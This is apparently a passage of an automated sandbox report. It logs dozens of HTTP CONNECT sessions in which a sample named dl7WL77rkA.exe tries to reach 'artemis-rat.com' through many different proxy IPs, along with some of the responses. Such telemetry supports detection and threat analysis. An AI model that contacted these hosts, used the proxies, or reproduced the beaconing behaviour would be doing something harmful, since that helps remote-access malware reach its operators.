                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1144192.168.2.552559178.236.246.5331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.420916080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.001852036 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1145192.168.2.553036219.243.212.11880803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.426731110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.753410101 CET22INHTTP/1.1 502 ERROR


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1146192.168.2.553186206.220.175.241453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.428761959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1147192.168.2.553124135.148.10.161604153876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.431241035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093034983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905122995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389684916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.093161106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.889548063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.592847109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.092796087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1148192.168.2.55316623.95.209.142156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.444675922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1149192.168.2.552411194.31.79.75314713876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.445240974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.498722076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595431089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702192068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1150192.168.2.553048143.64.8.2180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.446599007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1151192.168.2.55315092.204.134.38297183876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.450628996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.093033075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905127048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389689922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1152192.168.2.55308265.21.255.19731283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.454399109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.777761936 CET75INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.108834982 CET103INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                                                                                                                                                                                            Data Ascii: 400 Bad Request


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1153192.168.2.552544116.106.105.5510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.458671093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1154192.168.2.55317952.73.224.5431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.458918095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.675970078 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1155192.168.2.553115158.247.207.15330303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.465991020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.843049049 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1156192.168.2.55305961.178.152.3173023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.467132092 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.816929102 CET90INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1157192.168.2.55302760.211.195.150108003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.468276978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1158192.168.2.552428138.36.150.2610803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.472667933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1159192.168.2.55325412.186.205.123803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.478467941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1160192.168.2.552986103.231.45.14510803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.503216982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1161192.168.2.55322292.204.134.38544673876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.504647970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1162192.168.2.55309343.255.113.232803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.504955053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1163192.168.2.551421212.110.188.204344113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.510854959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.498836040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.595442057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.702203035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1164192.168.2.553088103.76.180.10831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.510857105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355074883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446400881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.702435017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:51.108190060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.462961912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.811486959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:02.253346920 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1165192.168.2.55326538.54.6.3990803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.525394917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.743761063 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1166192.168.2.55305345.251.231.11356783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.527617931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1167192.168.2.55325545.196.148.19254323876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.528561115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
